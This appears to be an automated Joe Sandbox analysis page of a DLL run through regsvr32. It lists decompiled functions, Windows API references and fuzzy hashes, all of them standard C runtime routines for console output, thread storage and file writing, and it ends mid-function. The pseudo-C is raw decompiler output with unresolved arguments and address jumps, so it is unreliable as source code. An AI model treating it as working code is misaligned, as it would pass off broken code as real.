Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: eec7dff64ec5c52d9157cbd157dfbab6f6a7a87af12ff6c832096e5b6ec65f04
Instruction ID: 1c791613199c6257dd6781e815376627e96cf0aa21d8aecdeaf9db267a8bb1d2
Opcode Fuzzy Hash: eec7dff64ec5c52d9157cbd157dfbab6f6a7a87af12ff6c832096e5b6ec65f04
Instruction Fuzzy Hash: 03217C24E0D64742FA646F32B56163962429F4F7B0F14C734D96E0B7D6EE2EB465C200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA095028C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFA095028F1
GetLastError.KERNEL32 ref: 00007FFA095028FD
CloseHandle.KERNEL32 ref: 00007FFA09502915
CreateFileW.KERNEL32 ref: 00007FFA09502940
WriteConsoleW.KERNEL32 ref: 00007FFA0950295F

Strings

CONOUT$, xrefs: 00007FFA09502921

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
Instruction ID: ca30501f4eb0b196c83a78ad48736f0898c116f96b2888efabcfc93feef3f4a9
Opcode Fuzzy Hash: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
Instruction Fuzzy Hash: 03116331B18A5186E7508F63F85472962A8FB8EFE4F048234DA5D87794DF3CE5588744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FBA4C Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFA094FB429,?,?,?,?,00007FFA09500426,?,?,00000000,00007FFA094FD8B7,?,?,?), ref: 00007FFA094FBA5B
FlsSetValue.KERNEL32(?,?,?,00007FFA094FB429,?,?,?,?,00007FFA09500426,?,?,00000000,00007FFA094FD8B7,?,?,?), ref: 00007FFA094FBA91
FlsSetValue.KERNEL32(?,?,?,00007FFA094FB429,?,?,?,?,00007FFA09500426,?,?,00000000,00007FFA094FD8B7,?,?,?), ref: 00007FFA094FBABE
FlsSetValue.KERNEL32(?,?,?,00007FFA094FB429,?,?,?,?,00007FFA09500426,?,?,00000000,00007FFA094FD8B7,?,?,?), ref: 00007FFA094FBACF
FlsSetValue.KERNEL32(?,?,?,00007FFA094FB429,?,?,?,?,00007FFA09500426,?,?,00000000,00007FFA094FD8B7,?,?,?), ref: 00007FFA094FBAE0
SetLastError.KERNEL32(?,?,?,00007FFA094FB429,?,?,?,?,00007FFA09500426,?,?,00000000,00007FFA094FD8B7,?,?,?), ref: 00007FFA094FBAFB

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 2fa0da27fe614c465e9bfeef243b6df5757a5299518a3d762b3cf139a2d538dd
Instruction ID: 2e40ce26676b10653fd03f50feabe36d0d8e9feeb1ef8306c5688537e4d99ac9
Opcode Fuzzy Hash: 2fa0da27fe614c465e9bfeef243b6df5757a5299518a3d762b3cf139a2d538dd
Instruction Fuzzy Hash: C9111520E0D64782FA646F72B9621392242DF4F7B0F04CB35E96E077D6EE6EB4658200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F9C24 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFA094F9C49
GetProcAddress.KERNEL32 ref: 00007FFA094F9C5F
FreeLibrary.KERNEL32 ref: 00007FFA094F9C86

Strings

mscoree.dll, xrefs: 00007FFA094F9C40
CorExitProcess, xrefs: 00007FFA094F9C58

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
Instruction ID: a09c0b42e12eb28b0bb3c5cf305ff5602741936c1fd6575701700b17c97b0f31
Opcode Fuzzy Hash: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
Instruction Fuzzy Hash: 1DF04961A18A0281EB108F75B8643796364EF9FBA1F548235DA6E463E4CF3DE048C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FEB68 Relevance: 7.6, APIs: 5, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00007FFA7FFA094FEB68(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x94feb9a;
				if (sil >= 0) goto 0x94feb9a;
				E00007FFA7FFA09501CEC(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x94febf1;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x94febb5;
				asm("dec eax");
				if (_t42 >= 0) goto 0x94febb5;
				E00007FFA7FFA09501CEC(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x94febf1;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x94febd1;
				asm("dec eax");
				if (_t43 >= 0) goto 0x94febd1;
				E00007FFA7FFA09501CEC(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x94febf1;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x94febf1;
				asm("dec eax");
				if (_t44 >= 0) goto 0x94febf1;
				if ((dil & 0x00000010) == 0) goto 0x94febee;
				E00007FFA7FFA09501CEC(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x94fec0b;
				asm("dec eax");
				if (_t46 >= 0) goto 0x94fec0b;
				E00007FFA7FFA09501CEC(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}

APIs

_set_statfp.LIBCMT ref: 00007FFA094FEB90
_set_statfp.LIBCMT ref: 00007FFA094FEBAB
_set_statfp.LIBCMT ref: 00007FFA094FEBC7
_set_statfp.LIBCMT ref: 00007FFA094FEC03

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
Instruction ID: 9bd36bb4b18627d5455ec912ef4d486b1c92e00a26dd0ce0cde72c2af119c7a2
Opcode Fuzzy Hash: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
Instruction Fuzzy Hash: 8C11BF26E4CA5301F6649F79F4B637A10847F9E361E04C635FA6F063E78E2DE855C109

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FBB14 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFA094F9403,?,?,00000000,00007FFA094F969E,?,?,?,?,?,00007FFA094F962A), ref: 00007FFA094FBB33
FlsSetValue.KERNEL32(?,?,?,00007FFA094F9403,?,?,00000000,00007FFA094F969E,?,?,?,?,?,00007FFA094F962A), ref: 00007FFA094FBB52
FlsSetValue.KERNEL32(?,?,?,00007FFA094F9403,?,?,00000000,00007FFA094F969E,?,?,?,?,?,00007FFA094F962A), ref: 00007FFA094FBB7A
FlsSetValue.KERNEL32(?,?,?,00007FFA094F9403,?,?,00000000,00007FFA094F969E,?,?,?,?,?,00007FFA094F962A), ref: 00007FFA094FBB8B
FlsSetValue.KERNEL32(?,?,?,00007FFA094F9403,?,?,00000000,00007FFA094F969E,?,?,?,?,?,00007FFA094F962A), ref: 00007FFA094FBB9C

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8052eee4b0d8af64d03de27b504a711c4d5b3c24d31682e890b399a3a393ee09
Instruction ID: 10a00e44a990ae904e3b1df26d3b5318f9e29c708a6af767d76d523375c91811
Opcode Fuzzy Hash: 8052eee4b0d8af64d03de27b504a711c4d5b3c24d31682e890b399a3a393ee09
Instruction Fuzzy Hash: AC113D10E0D64741FA585F32B96227952469F4F7B0F04C734D86D07BDAEE2DF465C200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FB9A8 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFA094FB9B9
FlsSetValue.KERNEL32 ref: 00007FFA094FB9D8
FlsSetValue.KERNEL32 ref: 00007FFA094FBA00
FlsSetValue.KERNEL32 ref: 00007FFA094FBA11
FlsSetValue.KERNEL32 ref: 00007FFA094FBA22

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 42504d049ca0b81dd607a4491970e33291414fa471f24a262c13f0c89c120e85
Instruction ID: ded19aec08f10648ea1859b9e107d1c583bb15e13c143476744dbc17ba014841
Opcode Fuzzy Hash: 42504d049ca0b81dd607a4491970e33291414fa471f24a262c13f0c89c120e85
Instruction Fuzzy Hash: 5611C524E0D60742F968AF32B86267A12418F4F770F18CB34D83E0A7D2EE2EB465D204

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09500958 Relevance: 6.3, APIs: 4, Instructions: 305
fileCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00007FFA7FFA09500958(void* __ecx, signed int __edx, void* __esi, void* __ebp, void* __esp, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t181;
				signed int _t186;
				signed int _t193;
				signed int _t198;
				void* _t212;
				signed char _t213;
				void* _t263;
				signed long long _t264;
				signed long long _t267;
				long long _t269;
				signed long long _t271;
				long long _t276;
				long long _t278;
				long long _t280;
				intOrPtr* _t289;
				intOrPtr _t294;
				long long _t295;
				long long _t318;
				void* _t326;
				long long _t327;
				void* _t328;
				long long _t329;
				long long _t331;
				signed char* _t332;
				signed char* _t333;
				signed char* _t334;
				intOrPtr* _t335;
				void* _t336;
				void* _t337;
				signed long long _t338;
				intOrPtr _t341;
				signed long long _t343;
				void* _t345;
				intOrPtr* _t347;
				intOrPtr _t351;
				signed long long _t356;
				signed long long _t359;
				signed long long _t361;
				void* _t364;
				long long _t365;
				long long _t367;
				char _t368;
				void* _t372;
				signed char* _t373;
				signed long long _t375;

				_t263 = _t337;
				_t336 = _t263 - 0x57;
				_t338 = _t337 - 0xe0;
				 *((long long*)(_t336 - 9)) = 0xfffffffe;
				 *((long long*)(_t263 + 8)) = __rbx;
				_t264 =  *0x956e008; // 0x36754d591002
				 *(_t336 + 0x17) = _t264 ^ _t338;
				 *((long long*)(_t336 - 0x49)) = __r8;
				_t289 = __rcx;
				_t367 =  *((intOrPtr*)(_t336 + 0x7f));
				 *((long long*)(_t336 - 0x51)) = _t367;
				 *(_t336 - 0x19) = __edx;
				_t267 = __edx >> 6;
				 *(_t336 - 0x59) = _t267;
				 *(_t336 - 0x11) = __edx;
				_t375 = __edx + __edx * 8;
				_t269 =  *((intOrPtr*)( *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 + _t267 * 8)) + 0x28 + _t375 * 8));
				 *((long long*)(_t336 - 0x29)) = _t269;
				r12d = r9d;
				_t365 = _t364 + __r8;
				 *((long long*)(_t336 - 0x71)) = _t365;
				 *((intOrPtr*)(_t336 - 0x61)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)(_t367 + 0x28)) != dil) goto 0x95009f8;
				0x94f9140();
				_t294 =  *((intOrPtr*)(_t367 + 0x18));
				r8d =  *(_t294 + 0xc);
				 *(_t336 - 0x5d) = r8d;
				 *((long long*)(__rcx)) = _t269;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if ( *((intOrPtr*)(_t336 - 0x49)) - _t365 >= 0) goto 0x9500db8;
				_t271 = __edx >> 6;
				 *(_t336 - 0x21) = _t271;
				 *((char*)(_t338 + 0x40)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t336 - 0x7d)) = 0;
				r12d = 1;
				if (r8d != 0xfde9) goto 0x9500bc0;
				_t347 = 0x3e + _t375 * 8 +  *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 + _t271 * 8));
				if ( *_t347 == dil) goto 0x9500a74;
				_t372 = _t329 + 1;
				if (_t372 - 5 < 0) goto 0x9500a61;
				if (_t372 == 0) goto 0x9500b52;
				r12d =  *((char*)(_t294 + 0x7ffa0956e8f0));
				r12d = r12d + 1;
				_t181 = r12d - 1;
				 *((intOrPtr*)(_t336 - 0x69)) = _t181;
				_t341 = _t181;
				if (_t341 -  *((intOrPtr*)(_t336 - 0x71)) - __r8 > 0) goto 0x9500d27;
				_t295 = _t329;
				 *((char*)(_t336 + _t295 - 1)) =  *_t347;
				if (_t295 + 1 - _t372 < 0) goto 0x9500ab9;
				if (_t341 <= 0) goto 0x9500aea;
				E00007FFA7FFA094F64D0( *( *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + 0x3e + _t375 * 8) & 0x000000ff, 0, __esi, __esp, _t336 - 1 + _t372, __r8, _t329, __r8, _t341);
				_t318 = _t329;
				 *((intOrPtr*)( *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + _t318 + 0x3e + _t375 * 8)) = dil;
				if (_t318 + 1 - _t372 < 0) goto 0x9500aed;
				 *((long long*)(_t336 - 0x41)) = _t329;
				_t276 = _t336 - 1;
				 *((long long*)(_t336 - 0x39)) = _t276;
				_t186 = (0 | r12d == 0x00000004) + 1;
				r12d = _t186;
				r8d = _t186;
				 *((long long*)(_t338 + 0x20)) = _t367;
				E00007FFA7FFA09501744(_t276, _t289, _t336 - 0x7d, _t336 - 0x39, _t341, _t336 - 0x41);
				if (_t276 == 0xffffffff) goto 0x9500db8;
				_t331 = __r8 +  *((intOrPtr*)(_t336 - 0x69)) - 1;
				goto 0x9500c55;
				_t368 =  *((char*)(_t276 + 0x7ffa0956e8f0));
				_t212 = _t368 + 1;
				_t343 =  *((intOrPtr*)(_t336 - 0x71)) - _t331;
				if (_t212 - _t343 > 0) goto 0x9500d55;
				 *((long long*)(_t336 - 0x69)) = _t329;
				 *((long long*)(_t336 - 0x31)) = _t331;
				_t193 = (0 | _t212 == 0x00000004) + 1;
				r14d = _t193;
				r8d = _t193;
				_t278 =  *((intOrPtr*)(_t336 - 0x51));
				 *((long long*)(_t338 + 0x20)) = _t278;
				E00007FFA7FFA09501744(_t278, _t289, _t336 - 0x7d, _t336 - 0x31, _t343, _t336 - 0x69);
				if (_t278 == 0xffffffff) goto 0x9500db8;
				_t332 = _t331 + _t368;
				r12d = r14d;
				goto 0x9500c55;
				_t359 =  *(_t336 - 0x59);
				_t351 =  *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 + _t359 * 8));
				_t213 =  *(_t351 + 0x3d + _t375 * 8);
				if ((_t213 & 0x00000004) == 0) goto 0x9500bf7;
				 *((char*)(_t336 + 7)) =  *((intOrPtr*)(_t351 + 0x3e + _t375 * 8));
				 *((char*)(_t336 + 8)) =  *_t332;
				 *(_t351 + 0x3d + _t375 * 8) = _t213 & 0x000000fb;
				r8d = 2;
				goto 0x9500c40;
				r8d =  *_t332 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t336 - 0x51)) + 0x18)))) + _t343 * 2)) >= 0) goto 0x9500c3a;
				_t373 =  &(_t332[1]);
				if (_t373 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x9500d93;
				r8d = 2;
				if (E00007FFA7FFA094FE960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t332, _t329, _t332, _t336, _t343,  *((intOrPtr*)(_t336 - 0x51))) == 0xffffffff) goto 0x9500db8;
				_t333 = _t373;
				goto 0x9500c55;
				_t198 = E00007FFA7FFA094FE960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t333, _t329, _t333, _t336, _t365,  *((intOrPtr*)(_t336 - 0x51)));
				if (_t198 == 0xffffffff) goto 0x9500db8;
				_t334 =  &(_t333[1]);
				 *((long long*)(_t338 + 0x38)) = _t329;
				 *((long long*)(_t338 + 0x30)) = _t329;
				 *((intOrPtr*)(_t338 + 0x28)) = 5;
				_t280 = _t336 + 0xf;
				 *((long long*)(_t338 + 0x20)) = _t280;
				r9d = r12d;
				_t345 = _t336 - 0x7d;
				E00007FFA7FFA094FD698();
				r14d = _t198;
				if (_t198 == 0) goto 0x9500db8;
				 *((long long*)(_t338 + 0x20)) = _t329;
				r8d = _t198;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x9500db0;
				 *((intOrPtr*)(_t289 + 4)) = __esi -  *((intOrPtr*)(_t336 - 0x49)) +  *((intOrPtr*)(_t289 + 8));
				if ( *((intOrPtr*)(_t336 - 0x79)) - r14d < 0) goto 0x9500db8;
				if ( *((char*)(_t338 + 0x40)) != 0xa) goto 0x9500d10;
				 *((short*)(_t338 + 0x40)) = 0xd;
				 *((long long*)(_t338 + 0x20)) = _t329;
				_t128 = _t280 - 0xc; // 0x1
				r8d = _t128;
				_t326 = _t338 + 0x40;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x9500db0;
				if ( *((intOrPtr*)(_t336 - 0x79)) - 1 < 0) goto 0x9500db8;
				 *((intOrPtr*)(_t289 + 8)) =  *((intOrPtr*)(_t289 + 8)) + 1;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + 1;
				if (_t334 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x9500db8;
				r8d =  *(_t336 - 0x5d);
				goto 0x9500a23;
				if (_t326 <= 0) goto 0x9500d50;
				_t335 = _t334 - _t373;
				 *((char*)( *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 + _t359 * 8)) + _t373 + 0x3e + _t375 * 8)) =  *((intOrPtr*)(_t335 + _t373));
				if (1 - _t326 < 0) goto 0x9500d2f;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) +  *((intOrPtr*)(_t289 + 4));
				goto 0x9500db8;
				if (_t345 <= 0) goto 0x9500d8d;
				_t327 = _t329;
				_t361 =  *(_t336 - 0x19) >> 6;
				_t356 =  *(_t336 - 0x11) +  *(_t336 - 0x11) * 8;
				 *((char*)( *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 + _t361 * 8)) + _t356 * 8 + _t327 + 0x3e)) =  *((intOrPtr*)(_t327 + _t335));
				_t328 = _t327 + 1;
				if (2 - _t345 < 0) goto 0x9500d6d;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + r8d;
				goto 0x9500db8;
				 *((char*)(_t356 + 0x3e + _t375 * 8)) =  *_t335;
				 *( *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) =  *( *((intOrPtr*)(0x7ffa094f0000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) | 0x00000004;
				_t174 = _t328 + 1; // 0x1
				 *((intOrPtr*)(_t289 + 4)) = _t174;
				goto 0x9500db8;
				 *_t289 = GetLastError();
				return E00007FFA7FFA094F3A70(_t206,  *((intOrPtr*)(_t336 - 0x61)),  *((intOrPtr*)(_t289 + 4)),  *(_t336 + 0x17) ^ _t338);
			}

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFA095009DF
WriteFile.KERNEL32 ref: 00007FFA09500CA6
WriteFile.KERNEL32 ref: 00007FFA09500CEF
GetLastError.KERNEL32 ref: 00007FFA09500DB0

Memory Dump Source

Source File: 00000003.00000002.324572118.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000003.00000002.324493360.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324739630.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324845757.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324853680.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324861129.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.324869383.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa094f0000_regsvr32.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
Instruction ID: 9bc12c100ec78fb1f3c9328ed998082a70462ec83fe63131d52e3f491ff1ff95
Opcode Fuzzy Hash: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
Instruction Fuzzy Hash: 27D1D423B08A8189E751CF7AE4402ED37B9FB5A798B148235CE5D57BD9CE38E45AC700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0950129C Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00007FFA7FFA0950129C(void* __ebx, signed int __ecx, void* __ebp, void* __esp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
				signed short _v80;
				void* _v92;
				signed int _v96;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				signed int _v120;
				long long _v128;
				signed int _v136;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed int _t128;
				intOrPtr _t146;
				intOrPtr _t147;
				void* _t169;
				signed long long _t182;
				signed long long _t186;
				signed long long _t189;
				signed long long _t208;
				signed int _t209;
				void* _t210;
				void* _t212;
				void* _t228;
				signed long long _t229;
				signed short* _t230;
				void* _t231;
				signed short* _t232;

				_t122 = __ebx;
				r15d = r8d;
				_t186 = __r9;
				_t230 = __rdx;
				if (r8d == 0) goto 0x9501599;
				if (__rdx != 0) goto 0x9501303;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v128 = __r9;
				_v136 = _t209;
				E00007FFA7FFA094F9674(__rax, __r9, __rcx, __rdx, _t210, _t212, __r8);
				goto 0x950159b;
				_t189 = __ecx >> 6;
				_v120 = _t189;
				_t229 = __ecx + __ecx * 8;
				if (_t210 - 1 - 1 > 0) goto 0x9501339;
				if (( !r15d & 0x00000001) == 0) goto 0x95012cc;
				if (( *( *((intOrPtr*)(0x956f940 + _t189 * 8)) + 0x38 + _t229 * 8) & 0x00000020) == 0) goto 0x950134f;
				r8d = 0x7ffa0956f942;
				E00007FFA7FFA09501E38(r12d);
				_v96 = _t209;
				if (E00007FFA7FFA095016A0(r12d, __ecx) == 0) goto 0x9501485;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x956f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x9501485;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x9501396;
				0x94f9140();
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t209) goto 0x95013b2;
				_t182 =  *((intOrPtr*)(0x956f940 + _v120 * 8));
				if ( *((intOrPtr*)(_t182 + 0x39 + _t229 * 8)) == dil) goto 0x9501485;
				if (GetConsoleMode(??, ??) == 0) goto 0x950147a;
				if (sil == 0) goto 0x9501457;
				sil = sil - 1;
				if (sil - 1 > 0) goto 0x950151e;
				_t228 = _t230 + _t231;
				_v112 = _t209;
				_t232 = _t230;
				if (_t230 - _t228 >= 0) goto 0x9501514;
